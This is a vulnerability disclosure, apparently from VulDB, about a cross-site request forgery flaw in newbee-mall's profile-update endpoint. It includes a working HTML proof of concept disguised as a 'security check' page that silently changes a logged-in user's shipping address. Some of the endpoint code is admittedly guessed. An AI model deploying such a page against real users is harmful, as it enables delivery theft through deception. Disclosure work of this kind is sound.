Submission #752805: newbee-ltd newbee-mall v1.0 CSRF (Info)

Title: newbee-ltd newbee-mall v1.0 CSRF
Description:

# CSRF Vulnerability in Personal Information Update

## Summary

A **CSRF vulnerability** exists in the personal information update endpoint `/personal/updateInfo`. Attackers can modify users' personal information, including shipping addresses, potentially redirecting deliveries to attacker-controlled locations.

## Vulnerability Details

### Configuration-Level Issue

**File**: `src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java`

```java
import org.springframework.context.annotation.Configuration;
import org.springframework.web.servlet.config.annotation.InterceptorRegistry;
import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;

@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
    // newBeeMallLoginInterceptor is injected elsewhere in this file (excerpt)

    @Override
    public void addInterceptors(InterceptorRegistry registry) {
        registry.addInterceptor(newBeeMallLoginInterceptor)
                .addPathPatterns("/personal/updateInfo");
        // ❌ Only authentication check, no CSRF protection
    }
}
```

### Endpoint-Level Code Analysis

Based on the project structure, the personal information update endpoint likely follows this pattern:

```java
@PostMapping("/personal/updateInfo")
@ResponseBody
public Result updateUserInfo(@RequestBody MallUser mallUser, HttpSession httpSession) {
    NewBeeMallUserVO user = (NewBeeMallUserVO) httpSession.getAttribute(Constants.MALL_USER_SESSION_KEY);
    // ❌ No CSRF token validation
    // ⚠️ Allows modification of sensitive user data including address
    mallUser.setUserId(user.getUserId());
    return mallUserService.updateUserInfo(mallUser);
}
```

**Security Issues**:

1. ❌ No CSRF token validation
2. ⚠️ Can modify shipping address to attacker's location
3. ⚠️ Combined with order CSRF, enables complete delivery hijacking

## Proof of Concept (PoC)

```html
<!DOCTYPE html>
<html>
<head>
  <title>Profile Verification Required</title>
</head>
<body>
  <h2>Security Check: Verify Your Information</h2>
  <p>We're updating our security settings. Please verify your account...</p>
  <script>
    // Modify user's shipping address
    fetch('http://localhost:28089/personal/updateInfo', {
      method: 'POST',
      credentials: 'include',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({
        nickName: 'User',
        introduceSign: 'Normal user',
        address: '123 Attacker Street, Hacker City, 99999', // Attacker's address
        // Other user fields remain unchanged
      })
    })
    .then(response => response.json())
    .then(data => {
      document.body.innerHTML = '<h3>✅ Verification complete! Thank you.</h3>';
    });
  </script>
</body>
</html>
```

## Impact

**User information tampering and delivery hijacking**: attackers can redirect product deliveries to their own addresses, leading to theft and financial loss for users.

---

**CVSS Score**: 7.3 (High)
Source: https://github.com/newbee-ltd/newbee-mall/issues/114
User: flashzyc (UID 92850)
Submitted: 05/02/2026 11:59 (4 months ago)
Moderated: 18/02/2026 07:56 (13 days later)
Status: Duplicate
VulDB Entry: 346456 [newbee-ltd newbee-mall up to a069069b07027613bf0e7f571736be86f431faee Multiple Endpoints cross-site request forgery]
Points: 0
